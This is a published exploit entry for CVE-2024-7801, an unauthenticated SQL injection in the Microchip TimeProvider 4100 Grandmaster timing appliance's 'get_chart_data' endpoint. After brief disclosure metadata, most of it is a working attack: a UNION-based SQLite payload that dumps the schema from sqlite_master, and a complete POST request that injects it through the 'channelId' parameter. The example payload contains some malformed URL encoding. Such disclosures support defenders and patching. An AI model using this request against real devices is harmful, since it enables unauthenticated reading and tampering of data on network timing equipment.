Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection

# Exploit Title: Microchip TimeProvider 4100 Grandmaster - Unauthenticated SQL Injection

# Exploit Author: Armando Huesca Prida, Marco Negro

# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

# Date of Disclosure: 27/06/2024

# Date of CVE Publication: 4/10/2024

# Exploit Publication: 11/10/2024

# Vendor Homepage: https://www.microchip.com/

# Version: Firmware release 1.0 through 2.4.7

# Tested on: Firmware release 2.3.12 

# CVE: CVE-2024-7801

# External References:

# URL: https://www.cve.org/cverecord?id=CVE-2024-7801

# URL: https://www.0xhuesca.com/2024/10/cve-2024-7801.html

# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-unathenticated-sql-injection

# URL: https://www.gruppotim.it/it/footer/red-team.html





# Vulnerability Description:



The TimeProvider® 4100 Grandmaster firmware has a SQL injection vulnerability in the “get_chart_data” web resource, specifically the “channelId” parameter is inserted directly into the SQL query (SQLite) at the table's name query parameter from which the FROM operation is performed. Unauthenticated threat actors can manipulate queries to execute malicious SQL commands against the device.





# Example of Malicious SQL Payload:



SELECT%20sql%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20sqlite_master$20WHERE&20type='table'$20LIMIT%201%20OFFSET%200--





# Proof of Concept - PoC:



By manually modifying the following request, it is possible to execute malicious SQL commands against the device. The list of values ​​that must be updated in the exploit HTTP request is given below:

- [malicious SQL payload]

- [device IP]





# Exploit - HTTP Request:



POST /get_chart_data HTTP/1.1

Host: [device IP]

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 146

Origin: https://[device IP]

Referer: https://[device IP]/perfmon_synce_stat

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-origin

Te: trailers

Connection: keep-alive



metric=mtie_a&xRange=1&tStart=-1&channelName=tenMHz&channelId=

1_status%20UNION%20 [malicious SQL payload] %20UNION%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20tenMHz1







# End